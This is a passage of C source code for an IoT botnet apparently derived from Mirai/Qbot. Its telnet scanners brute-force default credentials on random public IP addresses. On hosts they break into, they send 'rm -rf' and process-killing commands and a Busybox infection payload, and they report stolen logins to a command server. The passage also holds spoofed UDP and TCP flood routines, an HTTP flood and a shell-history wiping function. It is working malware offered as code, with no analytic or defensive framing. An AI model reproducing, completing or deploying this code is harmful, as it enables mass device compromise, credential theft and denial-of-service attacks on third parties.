875. (ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || // 100.64.0.0/10 - IANA NAT reserved
876. (ipState[0] == 169 && ipState[1] > 254) || // 169.254.0.0/16 - IANA NAT reserved
877. (ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || // 198.18.0.0/15 - IANA Special use
878. (ipState[0] == 224) || // 224.*.*.*+ - Multicast
879. (ipState[0] == 6 || ipState[0] == 7 || ipState[0] == 11 || ipState[0] == 21 || ipState[0] == 22 || ipState[0] == 26 || ipState[0] == 28 || ipState[0] == 29 || ipState[0] == 30 || ipState[0] == 33 || ipState[0] == 55 || ipState[0] == 214 || ipState[0] == 215)
880. )
881. {
882. ipState[0] = rand() % 223;
883. ipState[1] = rand() % 255;
884. ipState[2] = rand() % 255;
885. ipState[3] = rand() % 255;
886. }
887. char ip[16] = {0};
888. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
889. return inet_addr(ip);
890. }
891.  
892. in_addr_t getRandomIP(in_addr_t netmask) {
893. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
894. return tmp ^ ( rand_cmwc() & ~netmask);
895. }
896. unsigned short csum (unsigned short *buf, int count) {
897. register uint64_t sum = 0;
898. while( count > 1 ) { sum += *buf++; count -= 2; }
899. if(count > 0) { sum += *(unsigned char *)buf; }
900. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
901. return (uint16_t)(~sum);
902. }
903. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
904. struct tcp_pseudo {
905. unsigned long src_addr;
906. unsigned long dst_addr;
907. unsigned char zero;
908. unsigned char proto;
909. unsigned short length;
910. } pseudohead;
911. unsigned short total_len = iph->tot_len;
912. pseudohead.src_addr=iph->saddr;
913. pseudohead.dst_addr=iph->daddr;
914. pseudohead.zero=0;
915. pseudohead.proto=IPPROTO_TCP;
916. pseudohead.length=htons(sizeof(struct tcphdr));
917. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
918. unsigned short *tcp = malloc(totaltcp_len);
919. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
920. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
921. unsigned short output = csum(tcp,totaltcp_len);
922. free(tcp);
923. return output;
924. }
925. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
926. iph->ihl = 5;
927. iph->version = 4;
928. iph->tos = 0;
929. iph->tot_len = sizeof(struct iphdr) + packetSize;
930. iph->id = rand_cmwc();
931. iph->frag_off = 0;
932. iph->ttl = MAXTTL;
933. iph->protocol = protocol;
934. iph->check = 0;
935. iph->saddr = source;
936. iph->daddr = dest;
937. }
938. int sclose(int fd) {
939. if(3 > fd) return 1;
940. close(fd);
941. return 0;
942. }
943. void TelnetScanner(int wait_usec, int maxfds)
944. {
945. int max = getdtablesize() - 100, i, res, num_tmps, j;
946.  
947. char buf[128], cur_dir;
948. if (max > maxfds)
949. max = maxfds;
950. fd_set fdset;
951. struct timeval tv;
952. socklen_t lon;
953. int valopt;
954.  
955.  
956.  
957. char line[256];
958. char* buffer;
959. struct sockaddr_in dest_addr;
960. dest_addr.sin_family = AF_INET;
961. dest_addr.sin_port = htons(23);
962. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
963.  
964. buffer = malloc(SOCKBUF_SIZE + 1);
965. memset(buffer, 0, SOCKBUF_SIZE + 1);
966.  
967. struct telstate_t fds[max];
968.  
969. memset(fds, 0, max * (sizeof(int) + 1));
970. for(i = 0; i < max; i++)
971. {
972. memset(&(fds[i]), 0, sizeof(struct telstate_t));
973. fds[i].complete = 1;
974. fds[i].sockbuf = buffer;
975. }
976. while(1) {
977. for(i = 0; i < max; i++) {
978. if(fds[i].tTimeout == 0) {
979. fds[i].tTimeout = time(NULL);
980. }
981. switch(fds[i].state) {
982. case 0:
983. {
984. if(fds[i].complete == 1)
985. {
986. char *tmp = fds[i].sockbuf;
987. memset(&(fds[i]), 0, sizeof(struct telstate_t));
988. fds[i].sockbuf = tmp;
989.  
990. fds[i].ip = getRandomPublicIP();
991. }
992. else if(fds[i].complete == 0)
993. {
994. fds[i].usernameInd++;
995. fds[i].passwordInd++;
996.  
997. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
998. {
999. fds[i].complete = 1;
1000. continue;
1001. }
1002. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
1003. {
1004. fds[i].complete = 1;
1005. continue;
1006. }
1007. }
1008.  
1009. dest_addr.sin_family = AF_INET;
1010. dest_addr.sin_port = htons(23);
1011. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1012. dest_addr.sin_addr.s_addr = fds[i].ip;
1013.  
1014. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1015.  
1016. if(fds[i].fd == -1) continue;
1017. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1018. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
1019. {
1020. reset_telstate(&fds[i]);
1021. }
1022. else
1023. {
1024. advance_telstate(&fds[i], 1);
1025. }
1026. }
1027. break;
1028.  
1029. case 1:
1030. {
1031. FD_ZERO(&fdset);
1032. FD_SET(fds[i].fd, &fdset);
1033. tv.tv_sec = 0;
1034. tv.tv_usec = wait_usec;
1035. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1036.  
1037. if(res == 1) {
1038. fds[i].tTimeout = 0;
1039. lon = sizeof(int);
1040. valopt = 0;
1041. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1042. if(valopt)
1043. {
1044. reset_telstate(&fds[i]);
1045. }
1046. else
1047. {
1048. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1049. advance_telstate(&fds[i], 2);
1050. }
1051. continue;
1052. }
1053. else if(res == -1)
1054. {
1055. reset_telstate(&fds[i]);
1056. continue;
1057. }
1058. if(fds[i].tTimeout + 7 < time(NULL))
1059. {
1060. reset_telstate(&fds[i]);
1061. }
1062. }
1063. break;
1064. case 2:
1065. {
1066. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1067. {
1068. fds[i].tTimeout = time(NULL);
1069. if(contains_fail(fds[i].sockbuf))
1070. {
1071. advance_telstate(&fds[i], 0);
1072. }
1073. else
1074. {
1075. advance_telstate(&fds[i], 3);
1076. }
1077. continue;
1078. }
1079. if(fds[i].tTimeout + 7 < time(NULL))
1080. {
1081. reset_telstate(&fds[i]);
1082. }
1083. }
1084. break;
1085. case 3:
1086. {
1087. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
1088. {
1089. reset_telstate(&fds[i]);
1090. continue;
1091. }
1092. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1093. {
1094. reset_telstate(&fds[i]);
1095. continue;
1096. }
1097. advance_telstate(&fds[i], 4);
1098. }
1099. break;
1100. case 4:
1101. {
1102. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1103. {
1104. fds[i].tTimeout = time(NULL);
1105. if(contains_fail(fds[i].sockbuf))
1106. {
1107. advance_telstate(&fds[i], 0);
1108. }
1109. else
1110. {
1111. advance_telstate(&fds[i], 5);
1112. }
1113. continue;
1114. }
1115. if(fds[i].tTimeout + 7 < time(NULL))
1116. {
1117. reset_telstate(&fds[i]);
1118. }
1119. }
1120. break;
1121. case 5:
1122. {
1123. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
1124. {
1125. reset_telstate(&fds[i]);
1126. continue;
1127. }
1128. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1129. {
1130. reset_telstate(&fds[i]);
1131. continue;
1132. }
1133. advance_telstate(&fds[i], 6);
1134. }
1135. break;
1136. case 6:
1137. {
1138. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
1139. {
1140. fds[i].tTimeout = time(NULL);
1141.  
1142. if(contains_fail(fds[i].sockbuf))
1143. {
1144. advance_telstate(&fds[i], 0);
1145. }
1146. else if(contains_success(fds[i].sockbuf))
1147. {
1148. if(fds[i].complete == 2)
1149. {
1150. advance_telstate(&fds[i], 7);
1151. }
1152. else
1153. {
1154. sockprintf(mainCommSock, "[!] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1155. advance_telstate(&fds[i], 7);
1156. }
1157. }
1158. else
1159. {
1160. reset_telstate(&fds[i]);
1161. }
1162. continue;
1163. }
1164. if(fds[i].tTimeout + 7 < time(NULL))
1165. {
1166. reset_telstate(&fds[i]);
1167. }
1168. }
1169. break;
1170.  
1171. case 7:
1172. {
1173.  
1174. char RemoveTheTempDirs [80];
1175. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
1176. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1177. RemoveTempDirs();
1178. sockprintf(mainCommSock, "[!] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1179.  
1180. char killtheproccesses[80];
1181. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
1182. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1183. sockprintf(mainCommSock, "[!] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1184.  
1185. advance_telstate(&fds[i], 8);
1186. }
1187. break;
1188. case 8:
1189. {
1190. fds[i].tTimeout = time(NULL);
1191.  
1192. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
1193. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
1194.  
1195. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1196. sockprintf(mainCommSock, "[!] Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1197.  
1198.  
1199. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "CONNECTED"))
1200. {
1201.  
1202. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
1203. {
1204. sockprintf(mainCommSock, "[!] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1205. fds[i].complete = 3;
1206. }
1207. }
1208.  
1209. if(fds[i].tTimeout + 10 < time(NULL))
1210. {
1211. if(fds[i].complete!=3)
1212. {
1213. sockprintf(mainCommSock, "[!] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1214. }
1215. reset_telstate(&fds[i]);
1216. }
1217. break;
1218. }
1219. }
1220. }
1221. }
1222. }
1223.  
1224. void MiraiScanner(int wait_usec, int maxfds)
1225. {
1226. int max = getdtablesize() - 100, i, res, num_tmps, j;
1227. char buf[128], cur_dir;
1228. if (max > maxfds)
1229. max = maxfds;
1230. fd_set fdset;
1231. struct timeval tv;
1232. socklen_t lon;
1233. int valopt;
1234. char line[256];
1235. char* buffer;
1236. struct sockaddr_in dest_addr;
1237. dest_addr.sin_family = AF_INET;
1238. dest_addr.sin_port = htons(23);
1239. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1240. buffer = malloc(SOCKBUF_SIZE + 1);
1241. memset(buffer, 0, SOCKBUF_SIZE + 1);
1242. struct telstate_t fds[max];
1243. memset(fds, 0, max * (sizeof(int) + 1));
1244. for(i = 0; i < max; i++) {
1245. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1246. fds[i].complete = 1;
1247. fds[i].sockbuf = buffer;
1248. }
1249. while(1) {
1250. for(i = 0; i < max; i++) {
1251. if(fds[i].tTimeout == 0) {
1252. fds[i].tTimeout = time(NULL);
1253. }
1254. switch(fds[i].state) {
1255. case 0:
1256. {
1257. if(fds[i].complete == 1)
1258. {
1259.  
1260. char *tmp = fds[i].sockbuf;
1261. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1262. fds[i].sockbuf = tmp;
1263.  
1264.  
1265. fds[i].ip = MiraiIPRanges();
1266. }
1267. else if(fds[i].complete == 0)
1268. {
1269. fds[i].usernameInd++;
1270. fds[i].passwordInd++;
1271.  
1272. if(fds[i].passwordInd == sizeof(Mirai_Passwords) / sizeof(char *))
1273. {
1274. fds[i].complete = 1;
1275. }
1276. if(fds[i].usernameInd == sizeof(Mirai_Usernames) / sizeof(char *))
1277. {
1278. fds[i].complete = 1;
1279. continue;
1280. }
1281. }
1282. dest_addr.sin_family = AF_INET;
1283. dest_addr.sin_port = htons(23);
1284. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1285.  
1286. dest_addr.sin_addr.s_addr = fds[i].ip;
1287. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1288. if(fds[i].fd == -1) continue;
1289. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1290.  
1291. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
1292. {
1293. reset_telstate(&fds[i]);
1294. }
1295. else
1296. {
1297. advance_telstate(&fds[i], 1);
1298. }
1299. }
1300. break;
1301. case 1:
1302. {
1303. FD_ZERO(&fdset);
1304. FD_SET(fds[i].fd, &fdset);
1305. tv.tv_sec = 0;
1306. tv.tv_usec = wait_usec;
1307. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1308. if(res == 1)
1309. {
1310. fds[i].tTimeout = time(NULL);
1311. lon = sizeof(int);
1312. valopt = 0;
1313. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1314. if(valopt)
1315. {
1316. reset_telstate(&fds[i]);
1317. }
1318. else
1319. {
1320. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1321. advance_telstate(&fds[i], 2);
1322. }
1323. continue;
1324. }
1325. else if(res == -1)
1326. {
1327. reset_telstate(&fds[i]);
1328. continue;
1329. }
1330. if(fds[i].tTimeout + 7 < time(NULL))
1331. {
1332. reset_telstate(&fds[i]);
1333. }
1334. }
1335. break;
1336. case 2:
1337. {
1338. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1339. {
1340. fds[i].tTimeout = time(NULL);
1341. if(contains_fail(fds[i].sockbuf))
1342. {
1343. advance_telstate(&fds[i], 0);
1344. }
1345. else
1346. {
1347. advance_telstate(&fds[i], 3);
1348. }
1349. continue;
1350. }
1351. if(fds[i].tTimeout + 7 < time(NULL))
1352. {
1353. reset_telstate(&fds[i]);
1354. }
1355. }
1356. break;
1357. case 3:
1358. {
1359. if(send(fds[i].fd, Mirai_Usernames[fds[i].usernameInd], strlen(Mirai_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
1360. {
1361. reset_telstate(&fds[i]);
1362. continue;
1363. }
1364. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1365. {
1366. reset_telstate(&fds[i]);
1367. continue;
1368. }
1369. advance_telstate(&fds[i], 4);
1370. }
1371. break;
1372. case 4:
1373. {
1374. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1375. {
1376. fds[i].tTimeout = time(NULL);
1377. if(contains_fail(fds[i].sockbuf))
1378. {
1379. advance_telstate(&fds[i], 0);
1380. }
1381. else
1382. {
1383. advance_telstate(&fds[i], 5);
1384. }
1385. continue;
1386. }
1387. if(fds[i].tTimeout + 7 < time(NULL))
1388. {
1389. reset_telstate(&fds[i]);
1390. }
1391. }
1392. break;
1393. case 5:
1394. {
1395. if(send(fds[i].fd, Mirai_Passwords[fds[i].passwordInd], strlen(Mirai_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
1396. {
1397. reset_telstate(&fds[i]);
1398. continue;
1399. }
1400. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1401. {
1402. reset_telstate(&fds[i]);
1403. continue;
1404. }
1405. advance_telstate(&fds[i], 6);
1406. }
1407. break;
1408. case 6:
1409. {
1410. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
1411. {
1412. fds[i].tTimeout = time(NULL);
1413. if(contains_fail(fds[i].sockbuf))
1414. {
1415. advance_telstate(&fds[i], 0);
1416. }
1417. else if(contains_success(fds[i].sockbuf))
1418. {
1419. if(fds[i].complete == 2)
1420. {
1421. advance_telstate(&fds[i], 7);
1422. }
1423. else
1424. {
1425. sockprintf(mainCommSock, "[!] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
1426. advance_telstate(&fds[i], 7);
1427. }
1428. }
1429. else
1430. {
1431. reset_telstate(&fds[i]);
1432. }
1433. continue;
1434. }
1435. if(fds[i].tTimeout + 7 < time(NULL))
1436. {
1437. reset_telstate(&fds[i]);
1438. }
1439. }
1440. break;
1441. case 7:
1442. {
1443.  
1444. char RemoveTheTempDirs [80];
1445. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
1446. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1447. RemoveTempDirs();
1448. sockprintf(mainCommSock, "[!] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1449.  
1450. char killtheproccesses[80];
1451. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
1452. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1453. sockprintf(mainCommSock, "[!] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1454.  
1455. advance_telstate(&fds[i], 8);
1456. }
1457. break;
1458. case 8:
1459. {
1460.  
1461. fds[i].tTimeout = time(NULL);
1462.  
1463. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
1464. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
1465.  
1466. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1467. sockprintf(mainCommSock, "[!] Sending Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
1468.  
1469. //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
1470. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
1471. {
1472. //char strcasestr (const char *big, const char *little)
1473. if(strcasestr(fds[i].sockbuf, "CONNECTED") && fds[i].complete != 3)
1474. {
1475. sockprintf(mainCommSock, "[!] Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
1476. }
1477. }
1478. if(fds[i].tTimeout + 45 < time(NULL))
1479. {
1480. if(fds[i].complete!=3)
1481. {
1482. sockprintf(mainCommSock, "[!] Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Mirai_Usernames[fds[i].usernameInd], Mirai_Passwords[fds[i].passwordInd]);
1483. }
1484. reset_telstate(&fds[i]);
1485. }
1486. break;
1487. }
1488. }
1489. }
1490. }
1491. }
1492.  
1493. void SendSTD(unsigned char *ip, int port, int secs) {
1494. int iSTD_Sock;
1495. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
1496. time_t start = time(NULL);
1497. struct sockaddr_in sin;
1498. struct hostent *hp;
1499. hp = gethostbyname(ip);
1500. bzero((char*) &sin,sizeof(sin));
1501. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
1502. sin.sin_family = hp->h_addrtype;
1503. sin.sin_port = port;
1504. unsigned int a = 0;
1505. while(1){
1506. if (a >= 50) {
1507. send(iSTD_Sock, "std", 69, 0);
1508. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
1509. if (time(NULL) >= start + secs) {
1510. close(iSTD_Sock);
1511. _exit(0);
1512. }
1513. a = 0;
1514. }
1515. a++;
1516. }
1517. }
1518. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
1519. struct sockaddr_in dest_addr;
1520. dest_addr.sin_family = AF_INET;
1521. if(port == 0) dest_addr.sin_port = rand_cmwc();
1522. else dest_addr.sin_port = htons(port);
1523. if(getHost(target, &dest_addr.sin_addr)) return;
1524. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1525. register unsigned int pollRegister;
1526. pollRegister = pollinterval;
1527. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1528. if(!sockfd) {
1529. return;
1530. }
1531. int tmp = 1;
1532. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
1533. return;
1534. }
1535. int counter = 50;
1536. while(counter--) {
1537. srand(time(NULL) ^ rand_cmwc());
1538. init_rand(rand());
1539. }
1540. in_addr_t netmask;
1541. netmask = ( ~((1 << (32 - spoofit)) - 1) );
1542. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1543. struct iphdr *iph = (struct iphdr *)packet;
1544. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1545. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1546. udph->len = htons(sizeof(struct udphdr) + packetsize);
1547. udph->source = rand_cmwc();
1548. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1549. udph->check = 0;
1550. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1551. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1552. int end = time(NULL) + timeEnd;
1553. register unsigned int i = 0;
1554. while(1) {
1555. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1556. udph->source = rand_cmwc();
1557. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1558. iph->id = rand_cmwc();
1559. iph->saddr = htonl( getRandomIP(netmask) );
1560. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1561. if(i == pollRegister) {
1562. if(time(NULL) > end) break;
1563. i = 0;
1564. continue;
1565. }
1566. i++;
1567. }
1568. }
1569. void SendTCP(unsigned char *target, int port, int timeEnd, unsigned char *flags, int packetsize, int pollinterval, int spoofit) {
1570. register unsigned int pollRegister;
1571. pollRegister = pollinterval;
1572. struct sockaddr_in dest_addr;
1573. dest_addr.sin_family = AF_INET;
1574. if(port == 0) dest_addr.sin_port = rand_cmwc();
1575. else dest_addr.sin_port = htons(port);
1576. if(getHost(target, &dest_addr.sin_addr)) return;
1577. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1578. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1579. if(!sockfd) { return; }
1580. int tmp = 1;
1581. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
1582. in_addr_t netmask;
1583. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1584. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1585. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1586. struct iphdr *iph = (struct iphdr *)packet;
1587. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1588. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1589. tcph->source = rand_cmwc();
1590. tcph->seq = rand_cmwc();
1591. tcph->ack_seq = 0;
1592. tcph->doff = 5;
1593. if(!strcmp(flags, "all")) {
1594. tcph->syn = 1;
1595. tcph->rst = 1;
1596. tcph->fin = 1;
1597. tcph->ack = 1;
1598. tcph->psh = 1;
1599. } else {
1600. unsigned char *pch = strtok(flags, ",");
1601. while(pch) {
1602. if(!strcmp(pch, "syn")) { tcph->syn = 1;
1603. } else if(!strcmp(pch, "rst")) { tcph->rst = 1;
1604. } else if(!strcmp(pch, "fin")) { tcph->fin = 1;
1605. } else if(!strcmp(pch, "ack")) { tcph->ack = 1;
1606. } else if(!strcmp(pch, "psh")) { tcph->psh = 1;
1607. } else {
1608. }
1609. pch = strtok(NULL, ",");
1610. }
1611. }
1612. tcph->window = rand_cmwc();
1613. tcph->check = 0;
1614. tcph->urg_ptr = 0;
1615. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1616. tcph->check = tcpcsum(iph, tcph);
1617. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1618. int end = time(NULL) + timeEnd;
1619. register unsigned int i = 0;
1620. while(1) {
1621. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1622. iph->saddr = htonl( getRandomIP(netmask) );
1623. iph->id = rand_cmwc();
1624. tcph->seq = rand_cmwc();
1625. tcph->source = rand_cmwc();
1626. tcph->check = 0;
1627. tcph->check = tcpcsum(iph, tcph);
1628. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1629. if(i == pollRegister) {
1630. if(time(NULL) > end) break;
1631. i = 0;
1632. continue;
1633. }
1634. i++;
1635. }
1636. }
1637. int socket_connect(char *host, in_port_t port) {
1638. struct hostent *hp;
1639. struct sockaddr_in addr;
1640. int on = 1, sock;
1641. if ((hp = gethostbyname(host)) == NULL) return 0;
1642. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
1643. addr.sin_port = htons(port);
1644. addr.sin_family = AF_INET;
1645. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
1646. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
1647. if (sock == -1) return 0;
1648. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
1649. return sock;
1650. }
1651. void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
1652. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
1653. char request[512], buffer[1];
1654. for (i = 0; i < power; i++) {
1655. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
1656. if (fork()) {
1657. while (end > time(NULL)) {
1658. socket = socket_connect(host, port);
1659. if (socket != 0) {
1660. write(socket, request, strlen(request));
1661. read(socket, buffer, 1);
1662. close(socket);
1663. }
1664. }
1665. exit(0);
1666. }
1667. }
1668. }
1669.  
1670. void ClearHistory()
1671. {
1672. system("history -c;history -w");
1673. system("cd /;rm -rf ~/.bash_history");
1674. }
1675.  
1676. void RandomPythonRange()
1677. {
1678. //GET TO THIS SHIT LATER.
1679. }
1680.  
1681. void processCmd(int argc, unsigned char *argv[]) {
1682. if(!strcmp(argv[0], "PING"))
1683. {
1684. return;
1685. }
1686. if(!strcmp(argv[0], "TELNET"))
1687. {
1688. if(!strcmp(argv[1], "ON"))
1689. {
1690. uint32_t parent;
1691. parent = fork();
1692. int ii = 0;
1693. int forks = sysconf( _SC_NPROCESSORS_ONLN );
1694. int fds = 999999;
1695. if(forks == 1) fds = 500;
1696. if(forks >= 2) fds = 1000;
1697. if (parent > 0)
1698. {
1699. scanPid = parent;
1700. return;
1701. }
1702. else if(parent == -1) return;
1703.  
1704. for (ii = 0; ii < forks; ii++)
1705. {
1706. srand((time(NULL) ^ getpid()) + getppid());
1707. init_rand(time(NULL) ^ getpid());
